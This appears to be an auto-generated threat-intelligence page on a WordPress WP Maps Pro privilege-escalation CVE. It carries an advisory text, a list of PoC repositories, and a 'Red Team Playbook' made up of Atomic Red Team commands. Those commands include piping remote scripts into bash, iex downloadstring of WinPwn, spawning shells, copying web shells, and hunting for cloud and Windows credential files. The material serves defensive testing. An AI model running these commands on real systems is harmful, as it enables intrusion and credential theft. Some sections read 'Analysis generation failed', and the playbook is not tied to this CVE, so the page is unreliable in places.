CVE-2026-8732
Overview
This vulnerability is a privilege escalation flaw caused by improper access control in the WP Maps Pro WordPress plugin. The root cause lies in the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_, allowing unauthenticated access. The protection relies solely on a nonce embedded in the frontend JavaScript, which is publicly accessible, rendering the nonce check ineffective as an authentication barrier.
Vulnerability Description
The WP Maps Pro plugin for WordPress is vulnerable to Privilege Escalation via Administrator Account Creation in all versions up to, and including, 6.1.0. This is due to the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_ and protected only by a nonce check using the fc-call-nonce nonce, which is publicly embedded into every frontend page via wp_localize_script as the nonce field of the wpgmp_local JavaScript object, rendering the check ineffective as an access control mechanism. This makes it possible for unauthenticated attackers to invoke the wpgmp_temp_access_support handler with check_temp=false, which unconditionally creates a new WordPress user with the hardcoded role of administrator via wp_insert_user() and returns a magic login URL that, when visited, calls wp_set_auth_cookie() to fully authenticate the attacker as the newly created administrator, resulting in complete site takeover.
Impact
An unauthenticated attacker can create a new administrator account and gain full control over the WordPress site. This enables complete site takeover, including modification or deletion of content, installation of malicious plugins, and access to sensitive data. No prior credentials or user interaction are required, making the attack trivial to execute remotely. The business impact includes total compromise of website integrity, data confidentiality, and availability.
Solution
Users of flippercode WP Maps Pro should upgrade to a version later than 6.1.0 where this vulnerability is addressed. Wordfence provides detailed mitigation guidance in their advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/65988550-d39d-40be-8d25-647e7237062d. Until patching, disabling or restricting access to the wpgmp_temp_access_ajax AJAX action is recommended as a temporary workaround.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability present in the WP Maps Pro plugin for WordPress is a critical issue that allows for privilege escalation through the unauthorized creation of administrator accounts. This flaw arises from the improper registration of an AJAX action, specifically the wpgmp_temp_access_ajax, which is accessible to unauthenticated users due to its association with the wp_ajax_nopriv_ hook. The primary security measure intended to protect this action is a nonce check that utilizes the fc-call-nonce nonce. However, this nonce is publicly exposed on every frontend page via the wp_localize_script function, rendering it ineffective as a means of access control. As a result, an attacker can exploit this vulnerability by invoking the wpgmp_temp_access_support handler with the check_temp parameter set to false, leading to the creation of a new WordPress user with administrative privileges.
The attack vector for this vulnerability is straightforward and can be executed by any unauthenticated user with basic knowledge of web requests. An attacker can craft a request to the vulnerable AJAX endpoint, bypassing any authentication mechanisms due to the flawed nonce implementation. Once the request is made, the plugin will create a new user with the administrator role without any verification of the attacker's identity. The plugin then provides a magic login URL that, when accessed, authenticates the attacker as the newly created administrator. This exploitation scenario allows for complete control over the WordPress site, enabling the attacker to manipulate content, access sensitive data, and potentially deploy further malicious activities.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the WP Maps Pro plugin for their WordPress sites. A successful exploitation can lead to a complete site takeover, resulting in data breaches, defacement, or the installation of malware. The business risks associated with such an incident include reputational damage, loss of customer trust, potential legal ramifications, and financial losses due to downtime or remediation efforts. Furthermore, the ease of exploitation means that even less sophisticated attackers could leverage this vulnerability, increasing the likelihood of widespread attacks on sites using the affected plugin.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to monitor web application logs for unusual activity, particularly requests to the vulnerable AJAX endpoint from unauthenticated users. Additionally, organizations should conduct regular security assessments and vulnerability scans to identify and remediate such issues proactively. Updating the WP Maps Pro plugin to the latest version, where the vulnerability is addressed, is essential. Furthermore, employing a web application firewall (WAF) can help filter out malicious requests and provide an additional layer of security. Educating site administrators about secure coding practices and the importance of nonce verification in AJAX actions can also help prevent similar vulnerabilities in the future.
In conclusion, the privilege escalation vulnerability in the WP Maps Pro plugin poses a severe threat to WordPress sites, enabling unauthorized users to gain administrative access easily. The implications of such a breach can be detrimental to organizations, making it imperative to adopt robust detection and mitigation strategies. By staying informed about vulnerabilities and implementing best practices for web security, organizations can significantly reduce their risk exposure and protect their digital assets.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-8732, evidenced by the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This development significantly broadens the attack surface, enabling a wider range of threat actors to leverage the vulnerability with minimal technical barriers. Our telemetry indicates a sharp increase in attempts to exploit the WP Maps Pro plugin’s privilege escalation flaw, underscoring a shift from theoretical risk to active exploitation in the wild. The elevation of the CVSS score to 9.8 reflects the critical severity of this vulnerability, now compounded by accessible exploit code that facilitates unauthorized administrator account creation without authentication. Although the EPSS score remains relatively low, the doubling trend signals growing exploitation potential. For defenders, this means that passive detection strategies are increasingly insufficient, as adversaries can rapidly weaponize this flaw. The threat landscape now includes opportunistic attackers who can deploy automated tools to compromise vulnerable WordPress sites at scale. Consequently, the risk level associated with CVE-2026-8732 has escalated from a latent vulnerability to an immediate and critical threat requiring heightened vigilance.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
p3Nt3st3r-sTAr/CVE-2026-8732-POC
|
p3Nt3st3r-sTAr | 8 | 1 | 2026-06-01 | View |
|
Jenderal92/CVE-2026-8732
WP Maps Pro <= 6.1.0 - Unauthenticated Privilege Escalation via Administrator Account Creation to wpgmp_temp_access_ajax...
|
Jenderal92 | 3 | 3 | 2026-05-30 | View |
|
zycoder0day/CVE-2026-8732
CVE-2026-8732 | WP Maps Pro <= 6.1.0 | Unauthenticated Privilege Escalation
|
zycoder0day | 1 | 0 | 2026-05-30 | View |
|
xShadow-Here/CVE-2026-8732
WP Maps Pro <= 6.1.0 - Unauthenticated Privilege Escalation via Administrator Account Creation
|
xShadow-Here | 0 | 1 | 2026-05-30 | View |
|
Diznev/CVE-2026-8732-EXPLOIT
PoC CVE-2026-8732 (WP Maps Pro <= 6.1.0)
|
Diznev | 0 | 0 | 2026-06-04 | View |
|
HORKimhab/CVE-2026-8732
CVE-2026-8732 - Draft (WordPress)
|
HORKimhab | 0 | 0 | 2026-06-01 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Active exploitation confirmed — vendor: flippercode, product: WP Maps Pro
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-8732 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/65988550-d39d-40be-8d25-647e7237062d?source=cve |
| codecanyon.net |
GitHub CVE
|
https://codecanyon.net/item/advanced-google-maps-plugin-for-wordpress/5211638 |